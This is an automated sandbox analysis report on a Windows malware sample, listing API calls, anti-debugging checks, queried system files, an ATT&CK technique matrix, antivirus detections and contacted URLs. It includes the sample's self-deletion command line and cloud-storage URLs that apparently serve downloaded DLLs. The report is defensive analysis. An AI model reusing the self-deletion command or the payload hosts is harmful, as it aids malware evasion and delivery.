Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: zf_cef.dll.0.drBinary or memory string: VMware, Inc.1
Source: zf_cef.dll.0.drBinary or memory string: VMware, Inc.0
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: zf_cef.dll.0.drBinary or memory string: noreply@vmware.com
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_00481241 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00481241
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_004924C9 GetProcessHeap,0_2_004924C9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_00481241 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00481241
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0047A517 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0047A517
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0047A67A SetUnhandledExceptionFilter,0_2_0047A67A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0047A962 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0047A962
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exeJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0047A785 cpuid 0_2_0047A785
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00492090
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetLocaleInfoW,0_2_00492196
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0049226C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: EnumSystemLocalesW,0_2_004886F0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_004918F7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: EnumSystemLocalesW,0_2_00491BEE
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: EnumSystemLocalesW,0_2_00491BA3
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetLocaleInfoW,0_2_00488C1C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: EnumSystemLocalesW,0_2_00491C89
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00491D14
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetLocaleInfoW,0_2_00491F67
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0047A407 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0047A407
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_00472E50 GetVersionExA,0_2_00472E50
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
2
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Query Registry
Remote Desktop ProtocolData from Removable Media4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager21
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets31
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
Obfuscated Files or Information
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing
DCSync2
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Timestomp
Proc Filesystem34
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
File Deletion
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
LisectAVT_2403002B_185.exe100%AviraTR/Scar.wfhdm
LisectAVT_2403002B_185.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://crl.microsoft0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldll.0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/beijing.myqcloud.com/0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/m0%Avira URL Cloudsafe
